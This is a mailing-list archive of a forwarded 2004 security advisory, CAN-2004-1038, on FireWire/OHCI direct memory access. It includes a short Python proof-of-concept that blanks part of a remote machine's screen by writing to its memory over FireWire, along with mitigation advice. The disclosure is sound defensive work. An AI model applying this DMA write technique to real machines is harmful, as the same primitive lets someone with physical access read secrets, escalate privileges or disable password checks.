| 1 |
Hi, |
| 2 |
I thought this might be interesting. |
| 3 |
|
| 4 |
Ben. |
| 5 |
|
| 6 |
|
| 7 |
---------- Weitergeleitete Nachricht ---------- |
| 8 |
|
| 9 |
Subject: FireWire Security issues |
| 10 |
Date: Dienstag, 16. November 2004 21:30 |
| 11 |
From: Maximillian Dornseif <dornseif@××××××××××××××××××××××.de> |
| 12 |
To: freebsd-security@×××××××.org |
| 13 |
Cc: freebsd-firewire@×××××××.org |
| 14 |
|
| 15 |
Hello, |
| 16 |
|
| 17 |
looking into the issue described in the advisory below I wonder how to |
| 18 |
tackle this issues. Primarily |
| 19 |
I ask myself |
| 20 |
|
| 21 |
* is there any reason not to filter all physical memory access by default |
| 22 |
* what would be the appropriate way to change the filter set? a sysctl? |
| 23 |
|
| 24 |
Regards |
| 25 |
|
| 26 |
Maximillian Dornseif |
| 27 |
|
| 28 |
|
| 29 |
|
| 30 |
FireWire/IEEE 1394 direct memory access - CAN-2004-1038 |
| 31 |
|
| 32 |
Advisory URL: http://pacsec.jp/advisories.html |
| 33 |
|
| 34 |
Subject: Potential system compromise by connected FireWire devices |
| 35 |
CVE #: CAN-2004-1038 |
| 36 |
Affected: So far all tested Operating Systems with FireWire support |
| 37 |
|
| 38 |
Summary: |
| 39 |
-------- |
| 40 |
|
| 41 |
The FireWire/IEEE 1394 specification allows client devices to directly |
| 42 |
access host |
| 43 |
memory, bypassing operating system limitations. A malicious client device |
| 44 |
can read and modify sensitive memory, causing privilege escalation, |
| 45 |
information leakage and system compromise. Any system with sensitive |
| 46 |
information or in an unsecured physical location, esp. public access |
| 47 |
systems, should re-evaluate their system security and consider additional |
| 48 |
physical security measures if they are equipped with "FireWire" ports. |
| 49 |
These ports are also called "iLink" on some Sony models. |
| 50 |
|
| 51 |
|
| 52 |
Overview: |
| 53 |
--------- |
| 54 |
|
| 55 |
In the presentation, "0wned by an iPod" which Maximilian Dornseif from |
| 56 |
Laboratory for Dependable Distributed Systems at RWTH Aachen University |
| 57 |
held at the PacSec.jp/core04 conference in Tokyo on Nov 11/12, |
| 58 |
several new techniques involving the IEEE 1394 interface commonly |
| 59 |
found on laptops, desktops, and some servers were demonstrated. |
| 60 |
|
| 61 |
These techniques could be used in both malicious and beneficial applications. |
| 62 |
The beneficial applications are in the areas of system forensics and |
| 63 |
external debugging. The malicious applications are that anyone with |
| 64 |
physical access to the FireWire port could tamper with system operation |
| 65 |
and compromise security without measures such as power cycling or rebooting. |
| 66 |
|
| 67 |
Systems that counted on physical access limitation such as blocking access |
| 68 |
to reset and power switches and other measures to limit compromise though |
| 69 |
such procedures as rebooting, need to re-examine their security. |
| 70 |
|
| 71 |
As usual, physical access to a computer usually implies the ability |
| 72 |
for compromise - however, with this new technique, merely plugging |
| 73 |
in a malicious FireWire client device with special software |
| 74 |
could be enough to compromise a target. It becomes easier to |
| 75 |
violate security if the combination of physical access and FireWire |
| 76 |
interfaces are available. |
| 77 |
|
| 78 |
Security policies and procedures should be re-evaluated |
| 79 |
and consider this new information where needed. |
| 80 |
|
| 81 |
|
| 82 |
Details: |
| 83 |
-------- |
| 84 |
|
| 85 |
Firewire/1394 host adapters which comply to the OHCI specification |
| 86 |
allow remote devices to initiate direct DMA based memory access to the |
| 87 |
host computers main memory. This access takes place completely without |
| 88 |
involvement of the operating system on the host computer. While |
| 89 |
OHCI supplies certain methods to allow the filtering of such direct |
| 90 |
memory access requests, most operating systems do not use this filters |
| 91 |
or do not provide a way for the user to set such filters. |
| 92 |
|
| 93 |
This access can be used to read arbitrary memory from a system connected |
| 94 |
via FireWire and also to modify arbitrary memory contents. Applications |
| 95 |
of this capability include capture of screen |
| 96 |
contents, modification of screen contents, induced system crashes, |
| 97 |
escalation of process privileges and disabling of password queries. |
| 98 |
|
| 99 |
A simple application demonstrating screen blanking would look like |
| 100 |
this: |
| 101 |
|
| 102 |
#!/usr/bin/env python |
| 103 |
|
| 104 |
# Blank the medium third of a remote computer's screen via FireWire. |
| 105 |
|
| 106 |
# Demonstration for an presentation at PacSec 2004, see http://pacsec.jp/ |
| 107 |
# http://md.hudora.de/presentations/#firewire-pacsec for further |
| 108 |
# detail. |
| 109 |
# --Maximillian Dornseif |
| 110 |
|
| 111 |
# Take care - this file uses hard coded addresses for just |
| 112 |
# everything. You will at least have to change values in the addrs |
| 113 |
# dictionary to suit your own equipment. |
| 114 |
|
| 115 |
import sys, time |
| 116 |
import fw # import simple mapping of Apples FireWire API to Python |
| 117 |
# module available at http://c0re.23.nu/c0de/pyfw/ |
| 118 |
|
| 119 |
# this structure encodes FireWire GUID, start of the actual screen memory |
| 120 |
# resolution and bits per pixel |
| 121 |
# example values for a Dell Latitude X 200 running FreeBSD 5.3 |
| 122 |
addrs = { 0x00065b80030f21aeL: (0xe8000000L, 1024, 768, 4), } |
| 123 |
|
| 124 |
# enumerate devices on the FireWire bus and iterate over them |
| 125 |
for device in fw.scanbus(): |
| 126 |
print "Found device %r" % (device.guid) |
| 127 |
if device.guid not in addrs: |
| 128 |
print "don't now where to look on that machine, add it in the |
| 129 |
sourcecode" |
| 130 |
continue |
| 131 |
else: |
| 132 |
base, xres, yres, bpp = addrs[device.guid] |
| 133 |
|
| 134 |
# we just delete the medium third of the screen for |
| 135 |
demonstration purposes |
| 136 |
pos = base + (xres*bpp*(yres/3)) |
| 137 |
# iterate over screen lines and overwrite them with \0 |
| 138 |
while pos < base + (xres*bpp*(yres/3)*2): |
| 139 |
print "\r-> clearing %08x ..." % (pos), |
| 140 |
device.write(pos, "\0"*(xres*bpp)), |
| 141 |
sys.stdout.flush() |
| 142 |
pos += xres*bpp |
| 143 |
print done |
| 144 |
|
| 145 |
|
| 146 |
|
| 147 |
Systems Affected: |
| 148 |
----------------- |
| 149 |
|
| 150 |
We have tested this issue on FreeBSD 5.3 and 5.2.1, MacOS 10.3.5 and |
| 151 |
10.3.4 and Knoppix 3.6. All of them allowed memory access and had no |
| 152 |
obvious way to disable this functionality. We observed that Windows |
| 153 |
2000 Professional crashed whenever an Apple Macintosh Computer running |
| 154 |
MacOS X was connected. Other operating systems where not tested. |
| 155 |
|
| 156 |
Any operating system and any hardware with FireWire interfaces should |
| 157 |
be considered vulnerable as long as statement from the vendor on OHCI |
| 158 |
filters or similar means of access control are available. Even if the |
| 159 |
operating system in question does not support the interface, compromise |
| 160 |
may still be possible if the hardware is powered. |
| 161 |
|
| 162 |
|
| 163 |
Fix: |
| 164 |
---- |
| 165 |
|
| 166 |
On some systems that require untrusted/unauthenticated physical |
| 167 |
access by strangers and still require restricted operations, removal |
| 168 |
of wire headers connecting external case FireWire jacks may provide |
| 169 |
some limited remigration. |
| 170 |
|
| 171 |
On laptops epoxy may be used to permanently disable the external jack |
| 172 |
if such loss of functionality can be tolerated. |
| 173 |
|
| 174 |
The primary precaution is that employees should be warned that they |
| 175 |
should not plug unknown/untrusted FireWire devices into computers |
| 176 |
containing sensitive information. |
| 177 |
|
| 178 |
Operating system vendors should supply users with a way to control |
| 179 |
OHCI filters. Default configurations should deny all memory access via |
| 180 |
FireWire. |
| 181 |
|
| 182 |
|
| 183 |
Credits: |
| 184 |
-------- |
| 185 |
|
| 186 |
* Firestarter by Quinn "The Eskimo!" for demonstrating the potential |
| 187 |
of FireWire to us - http://www.quinn.echidna.id.au/Quinn/WWW/Hacks.html |
| 188 |
* Hidetoshi Shimokawa for his FreeBSD FireWire Driver and his |
| 189 |
revealing post "FireWire for kernel hackers" - |
| 190 |
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=597886+0+archive/2002/freebsd-ha |
| 191 |
ckers/20020414.freebsd-hackers * |
| 192 |
|
| 193 |
* Kerneltrap for pointing us to FreeBSD FireWire drivers |
| 194 |
- http://kerneltrap.org/node/view/145 |
| 195 |
|
| 196 |
|
| 197 |
Contact: |
| 198 |
-------- |
| 199 |
|
| 200 |
Maximillian Dornseif |
| 201 |
Laboratory for Dependable Distributed Systems |
| 202 |
RWTH Aachen University, Germany |
| 203 |
email: dornseif@××××××××××××××××××××××.de |
| 204 |
Phone: +49-241-80-21431 |
| 205 |
Web: http://md.hudora.de/ |
| 206 |
|
| 207 |
History: |
| 208 |
-------- |
| 209 |
|
| 210 |
- 2004-10-26 initial disclosure |
| 211 |
- 2004-11-15 updated to contain executive sumary, more details, |
| 212 |
example code, history and credits section |
| 213 |
- 2004-11-16 CAN-2004-1038 has been assigned to this issue |
| 214 |
|
| 215 |
|
| 216 |
_______________________________________________ |
| 217 |
freebsd-security@×××××××.org mailing list |
| 218 |
http://lists.freebsd.org/mailman/listinfo/freebsd-security |
| 219 |
To unsubscribe, send any mail to "freebsd-security-unsubscribe@×××××××.org" |
| 220 |
|
| 221 |
------------------------------------------------------- |
| 222 |
|
| 223 |
-- |
| 224 |
gentoo-security@g.o mailing list |
Archives